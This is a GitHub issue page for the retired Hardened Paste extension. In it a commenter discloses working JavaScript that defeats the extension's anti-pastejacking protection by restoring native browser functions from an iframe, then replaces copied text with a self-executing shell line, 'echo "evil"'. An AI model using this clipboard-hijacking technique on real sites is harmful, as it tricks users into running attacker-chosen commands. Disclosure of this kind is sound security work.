search

rocketshipapps / hardenedpaste

[Retired] Hardened Paste is a browser extension that prevents the “pastejacking” exploit.
http://hardenedpaste.com/
GNU General Public License v3.0
30 stars 3 forks source link

Bypasses via iFrames #8

Closed matt- closed 7 years ago

matt- commented 8 years ago 
document.addEventListener("DOMContentLoaded", function(event) {

    // add a new iframe and get its window object (but don't load content out set source.. )
    // we could also load a blank document on the same domain with: ifrm.setAttribute("sandbox", 'allow-same-origin');
    var win = document.body.appendChild(document.createElement("IFRAME")).contentWindow;

    // reset addEventListener
    EventTarget.prototype.addEventListener = function(type, listener, useCapture) {
        return win.EventTarget.prototype.addEventListener.call(this, type, listener, useCapture);
    }

    // reset setData
    DataTransfer.prototype.setData = function(format, data){
        console.log(format, data);
        return win.DataTransfer.prototype.setData.call(this, format, data);
    }
    // do the same with HTMLDocument.prototype.execCommand if you need it.. 

    // do normal bad stuff.. 
    document.oncopy = function(e){
        e.clipboardData.setData('text/plain', 'echo "evil"\r\n');
        e.preventDefault();
    };
});
oldestlivingboy commented 7 years ago

Thank you for the report – we’ve retired Hardened Paste, but the code remains available here.